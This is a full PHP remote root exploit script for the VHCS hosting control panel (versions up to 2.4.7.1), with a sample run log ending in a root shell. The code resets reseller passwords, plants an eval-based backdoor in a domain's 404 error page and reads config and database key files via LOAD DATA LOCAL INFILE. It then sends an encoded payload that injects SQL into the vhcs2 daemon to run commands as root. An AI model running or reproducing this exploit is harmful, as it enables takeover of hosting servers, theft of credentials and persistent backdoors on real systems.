VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
#!/usr/bin/php -q
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');
# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
# VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
# --------------------------------------------------
#
# About:
# by DarkFig < gmdarkfig (at) gmail (dot) com >
# http://acid-root.new.fr/
# #acidroot@xxxxxxxxxxxxxxxx
#
# Exploit:
# + Logged in (Administrator)
# + The administrator has 2 resellers
# / Changing dareseller's password
# / Trying to connect as dareseller:thatpwnz
# + Login successful
# + The reseller has 2 users
# + Host domaintest.fr is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# - User doesn't have SQL rights
# / Host domaintest.fr isn't a valid user
# + Host xpliamaclient.com is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# - User doesn't have SQL rights
# / Host xpliamaclient.com isn't a valid user
# / Changing unautresel's password
# / Trying to connect as unautresel:thatpwnz
# + Login successful
# + The reseller has 1 users
# + Host thegoodone.com is connected
# / Trying to write PHP code
# + PHP code successfully written
# / We'll have to bypass open_basedir cause safe_mode=On
# / Trying to create a database
# + Database 92xpl_db39 successfully created
# + Using database id 12
# / Trying to add SQL user
# + User 93xpl_usr2 successfully created
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
# + Now you can execute commands as root =]
# + root@xxxxxxxxxxxxxx: id
#
# uid=0(root) gid=0(root)
#
class vhcs_xpl extends phpsploit
{
var $sleep_time = 4;
# -rw-r--r-- 1 root root
var $conf_path = '/etc/vhcs2/vhcs2.conf';
# -r-------- 1 www-data www-data
var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';
var $head_arr = array(
'admin/index.php' => 3,
'reseller/index.php' => 2,
'../reseller/index.php' => 2,
'client/index.php' => 1,
'' => 0);
var $privileges = array(
3 => 'Administrator',
2 => 'Reseller',
1 => 'Client');
var $reg_arr = array(
1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a>
</td>#i',
2 => '#edit_user.php\?edit_id=([0-9]+)"
class="link">(.*)</a></td>#i',
3 => '#delete_sql_database\.php\?id=([0-9]+)#i',
4 => '#delete_sql_database\.php\?id=([0-9]+)#i',
5 => '#sql_execute_query.php\?id=([0-9]+)#i');
var $flags = array(
-1 => '-',
0 => '/',
1 => '+');
function main()
{
$this->agent('Mozilla Firefox');
$this->cookiejar(1);
$this->mhead();
$this->uri = $this->getparam('url', TRUE);
$this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch');
$this->proxh = $this->getparam('proxhost');
$this->proxa = $this->getparam('proxauth');
if($this->proxh)
$this->proxy($this->proxh);
if($this->proxa)
$this->proxyauth($this->proxa);
print "\nExploit:";
$this->type = $this->login();
if(empty($this->type))
{
if(!$this->patch)
{
$this->msg('A patch has been applied to this
website', -1);
$this->msg("See RoMaNSoFt's advisory for more
details", -1);
$this->msg('Try with the -patch option', -1, 1);
}
else
$this->msg('Bad username/password', -1, 1);
}
$this->msg("Logged in (".$this->usr.' -
'.$this->privileges[$this->type].')', 1);
$this->allowredirection(1);
$this->get_vhcs_conf();
$this->exec_cmd();
return;
}
function getparam($param, $nec=FALSE)
{
global $argv;
foreach($argv as $value => $key)
{
if($key === '-'.$param)
return $argv[$value+1];
}
if($nec)
$this->usage();
return FALSE;
}
function mhead()
{
print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
print "\n --------------------------------------------------\n";
print "\nAbout:";
print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
print "\n http://acid-root.new.fr/";;
print "\n #acidroot@xxxxxxxxxxxxxxxx";
print "\n";
return;
}
function usage()
{
print "\nUsage:";
print "\n vhcsxpl.php -url <url> [options...]\n";
print "\nOptions:";
print "\n -patch <user:pwd> Unofficial patch applied";
print "\n -proxhost <ip> If you wanna use a proxy";
print "\n -proxauth <usr:pwd> Proxy with authentication\n";
print "\n";
exit(1);
}
function log_as()
{
$this->msg("Trying to connect as ".$this->usr.':'.$this->pwd,
0);
$this->allowredirection(1);
$this->post($this->uri.'chk_login.php',
'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');
$this->redir_type = $this->get_type_by_redir();
if($this->redir_type == 0)
$this->msg('Login attempt failed', -1);
else
$this->msg('Login successful', 1);
return $this->redir_type;
}
function get_type_by_redir()
{
$this->redir_arr = parse_url($this->last_redirection);
$this->allowredirection(0);
return $this->head_arr[$this->redir_arr['path']];
}
function login()
{
if($this->patch)
{
$this->idents = explode(':', $this->patch);
list($this->usr, $this->pwd) = $this->idents;
$this->type = $this->log_as();
return $this->log_as_user();
}
else
{
$this->get($this->uri.'admin/manage_users.php');
$this->type = 3;
if(ereg('add_user\.php', $this->getcontent()))
return $this->log_as_user();
else
return 0;
}
}
function log_as_user()
{
if($this->type == 3)
$this->logged_as_admin();
if($this->type == 2)
$this->logged_as_reseller();
if($this->type == 1)
{
if(!$this->patch)
return 1;
else
return $this->valid_user();
}
else
return 0;
}
function valid_user()
{
if($this->write_code())
{
# open_basedir + safe_mode
if($this->is_safe())
{
if($this->bypass_with_db())
return 1;
else
return 0;
}
else
return 1;
}
return 0;
}
function logged_as_admin()
{
$this->msg('Logged in ('.$this->privileges[3].')', 1);
$this->get($this->uri.'admin/manage_users.php');
preg_match_all($this->reg_arr[1], $this->getcontent(),
$resellers);
$this->reseller_count = count($resellers[1]);
$this->msg('The administrator has '.$this->reseller_count.'
resellers', 1);
for($i=0; $i<$this->reseller_count; $i++)
{
$this->usr = $resellers[2][$i];
$this->pwd = 'thatpwnz';
if(!$this->patch)
{
$this->msg('Changing '.$resellers[2][$i]."'s
password", 0);
$this->reseller_dat = '';
$this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);
# only checked ip
preg_match_all('#name="ip_([0-9]+)"
value="asgned" checked#i',
$this->getcontent(), $reseller_ips);
$this->ip_count = count($reseller_ips[1]);
$this->ip_dat = '';
for($j=0; $j<$this->ip_count; $j++)
{
$this->ip_dat .=
'ip_'.$reseller_ips[1][$j].'=asgned';
if($j != $this->ip_count-1)
$this->ip_dat .= '&';
}
# Change reseller's password/mail
# This is needed if it was run without -path
# Because we can't click on the 'Change' button.
#
# pwd: thatpwnz
# mail: <reseller_name>@ohyeah.com
#
$this->post($this->uri.'admin/edit_reseller.php',
'username='.$resellers[2][$i].'&pass=thatpwnz&'.
'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
'eller_max_subdomain_cnt=0&nreseller_max_alias'.
'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
'&nreseller_max_disk=0&'.$this->ip_dat.'&custo'.
'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
'ate++&uaction=update_reseller&edit_id='.
$resellers[1][$i].'&edit_username='.
$resellers[2][$i]);
if($this->log_as() != 2)
return 0;
}
else
{
$this->allowredirection(1);
$this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);
if($this->get_type_by_redir() != 2)
return 0;
}
if($this->logged_as_reseller())
return 1;
$this->reset('cookie');
$this->get($this->uri.'reseller/change_user_interface.php?action=go_back');
}
return 0;
}
function logged_as_reseller()
{
$this->get($this->uri.'reseller/users.php');
preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
array_walk($users[2], 'trim');
$this->user_count = count($users[1]);
$this->msg('The reseller has '.$this->user_count. ' users', 1);
$this->patch = FALSE;
for($i=0; $i<$this->user_count; $i++)
{
if($this->is_alive($users[2][$i]))
{
$this->usr = $users[2][$i];
$this->type = 1;
$this->msg('Host '.$this->usr.' is connected',
1);
$this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);
if($this->valid_user())
{
$this->msg('Host '.$this->usr.' is a
valid user', 1);
return TRUE;
}
else
$this->msg("Host ".$this->usr." isn't a
valid user", 0);
}
else
$this->msg('Host '.$users[2][$i].' seems down', -1);
$this->get($this->uri.'client/change_user_interface.php?action=go_back');
}
return FALSE;
}
function bypass_with_db()
{
$this->get($this->dmn_vhcs_url.'client/index.php');
if(!ereg('manage_sql.php', $this->getcontent()) and !$edit)
{
$this->msg("User ".$this->ur." doesn't have SQL
rights", -1);
return FALSE;
}
# No database
if(!$this->got_db())
{
$this->msg('Trying to create a database', 0);
$this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);
# Database: ..xpl_db..
$this->post($this->dmn_vhcs_url.'client/add_sql_database.php',
'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'.
'uaction=add_db');
if($this->got_db())
$this->msg('Database '.$this->tmp_db_name.'
successfully created', 1);
else
{
$this->msg("Can't create the database
".$this->tmp_db_name, 0);
return FALSE;
}
}
# First database
$this->db_id = $this->sql_db_ids[1];
$this->msg('Using database id '.$this->db_id, 1);
if(!$this->got_db_user())
{
$this->msg('Trying to add SQL user', 0);
$this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
# SQL user: ..xpl_usr..:xpl_pwd
$this->post($this->dmn_vhcs_url.'client/sql_add_user.php',
'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'.
'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
$this->db_id);
if($this->got_db_user())
$this->msg('User '.$this->tmp_db_user.' successfully
created', 1);
else
{
$this->msg("Can't create the SQL user
".$this->tmp_db_user, 0);
return FALSE;
}
}
# First SQL user id associed with the database
$this->db_user_id = $this->sql_usrs[1];
$this->msg('Using SQL user id '.$this->db_user_id, 1);
return TRUE;
}
function got_db_user()
{
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');
$this->content_arr = explode("\n", $this->getcontent());
$this->is_sql_db_usr = FALSE;
for($i=0; $i<count($this->content_arr); $i++)
{
if(preg_match($this->reg_arr[4],
$this->content_arr[$i], $this->sql_db_id))
{
if($this->sql_db_id[1] == $this->db_id)
$this->is_sql_db_usr = TRUE;
else
$this->is_sql_db_usr = FALSE;
}
if(preg_match($this->reg_arr[5],
$this->content_arr[$i], $this->sql_usrs))
{
if($this->is_sql_db_usr)
return TRUE;
}
}
return FALSE;
}
function got_db()
{
$this->get($this->dmn_vhcs_url.'client/manage_sql.php');
preg_match($this->reg_arr[3],
$this->getcontent(), $this->sql_db_ids);
if(empty($this->sql_db_ids))
return FALSE;
else
return TRUE;
}
function is_alive($domain_name)
{
if(gethostbyname($domain_name) != $domain_name)
return TRUE;
else
return FALSE;
}
function write_code()
{
$this->msg('Trying to write PHP code', 0);
$this->dmn_url = 'http://'.$this->usr;
$this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];
$this->get($this->dmn_url.'/errors/404/index.php');
$this->old_404 = $this->getcontent();
$this->phpc =
'<?php '
.'error_reporting(0); '
.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
.'?>';
$this->new_404 = $this->phpc.$this->old_404;
$this->post($this->dmn_vhcs_url.'client/error_pages.php',
'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');
$this->exec_php('print "itworkz";');
if(ereg('itworkz', $this->getcontent()))
{
$this->msg('PHP code successfully written', 1);
return TRUE;
}
else
{
$this->msg("Can't write PHP code", -1);
return FALSE;
}
}
function get_vhcs_conf()
{
if($this->safe_mode)
$this->msg('Trying to load files via local_infile', 0);
else
$this->msg('Trying to load files via shell_exec', 0);
$this->lf_conf = $this->path_content($this->conf_path);
$this->lf_conf = trim($this->lf_conf, "\r");
$this->vhcs_conf = explode("\n", $this->lf_conf);
$this->conf = array();
foreach($this->vhcs_conf as $this->conf_line)
{
# comment
if(!ereg('^(\s*)#', $this->conf_line))
{
$this->pos = strpos($this->conf_line, '=');
$this->name =
strtoupper(trim(substr($this->conf_line, 0, $this->pos)));
$this->value = trim(substr($this->conf_line,
$this->pos+1));
$this->conf[$this->name] = $this->value;
}
}
$this->php_keys_code = $this->path_content($this->keys_path);
return;
}
function path_content($path)
{
# open_basedir On/off
# safe_mode = Off
if(!$this->safe_mode)
{
$this->phpc = 'print shell_exec("cat '.$path.'");';
$this->exec_php($this->phpc);
$this->file_content = $this->getcontent();
}
# open_basedir On/Off
# safe_mode = On
else
{
$this->rand_table = rand().'tmp_hax'.rand();
$this->sql_query =
"CREATE TABLE ".$this->rand_table." (content text not
null); ".
"LOAD DATA LOCAL INFILE '$path' INTO TABLE
".$this->rand_table.
" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES
TERMINAT".
"ED BY '__EOF__'; SELECT
CONCAT(CHAR(80,87,78,69,68,67,79,78,".
"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
$this->rand_table;
$this->sql_arr = explode(';', $this->sql_query);
$this->sql_cnt = count($this->sql_arr);
for($i=0; $i<$this->sql_cnt; $i++)
{
$this->sql_res =
$this->exec_sql($this->sql_arr[$i]);
if($i == $this->sql_cnt-2)
$this->file_content = $this->sql_res;
}
}
if(!$this->file_content)
{
$this->msg("A problem occurred while trying to read the
file $path", -1);
if($this->safe_mode)
$this->msg("local_infile=Off or we don't have
sufficient access rights to the file", -1, 2);
else
$this->msg("We don't have sufficient access rights
to the file", -1, -2);
}
else
$this->msg("Ok: $path", 1);
return $this->file_content;
}
function exec_sql($query)
{
$this->post($this->dmn_vhcs_url.'client/sql_execute_query.php',
'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
'cute_query&id='.$this->db_user_id);
$this->sql_result = '';
if(ereg('PWNEDCONTENT', $this->getcontent()))
{
$this->sql_res_arr = explode('PWNEDCONTENT',
$this->getcontent());
$this->sql_result = pack('H*', $this->sql_res_arr[1]);
}
return $this->sql_result;
}
function is_safe()
{
$this->phpc =
'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
.'or !function_exists("shell_exec")) '
.'{ print "safe_mode=on"; }';
$this->exec_php($this->phpc);
# open_basedir always set
if(ereg('safe_mode=on', $this->getcontent()))
{
$this->msg("We'll have to bypass open_basedir cause
safe_mode=On", 0);
$this->safe_mode = TRUE;
}
else
{
$this->msg('PHP configured with default safe_mode value
(Off)', 0);
$this->safe_mode = FALSE;
}
return $this->safe_mode;
}
function exec_cmd()
{
$this->msg("Now you can execute commands as root =]", 1);
$this->woot_code =
'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
.'RsaW5lOw0KfQo/Pgo=';
while($this->cmd_prompt())
{
$this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
$this->tmp_file = $this->getcontent().'/'.md5(rand());
$this->set_hvar('db-host',
$this->conf['DATABASE_HOST']);
$this->set_hvar('db-user',
$this->conf['DATABASE_USER']);
$this->set_hvar('db-pass',
$this->conf['DATABASE_PASSWORD']);
$this->set_hvar('db-name',
$this->conf['DATABASE_NAME']);
$this->set_hvar('sleep-time', $this->sleep_time);
$this->set_hvar('file', $this->tmp_file);
$this->set_hvar('cmd', $this->cmd);
$this->set_hvar('version', $this->conf['Version']);
$this->set_hvar('php-keys',
'?>'.$this->php_keys_code);
$this->exec_php('?>'.base64_decode($this->woot_code));
print "\n".$this->getcontent();
}
exit(0);
}
function set_hvar($name, $value)
{
$this->addheader('Sploit-'.$name, base64_encode($value));
return;
}
function cmd_prompt()
{
$this->msg('root@'.$this->usr.': ', 1);
$this->cmd = trim(fgets(STDIN));
if(!ereg('^(quit|exit)$', $this->cmd))
return TRUE;
else
return FALSE;
}
function exec_php($php)
{
$this->addheader('Shell', base64_encode($php));
$this->get($this->dmn_url.'/errors/404/index.php');
return;
}
function msg($msg, $flag, $action=0)
{
print "\n ".$this->flags[$flag]."\x20".$msg;
switch($action)
{
case 1:
print "\n";
return $this->usage();
break;
case 2:
print "\n";
exit(1);
break;
}
}
}
$spl = new vhcs_xpl;
$spl->main();
?>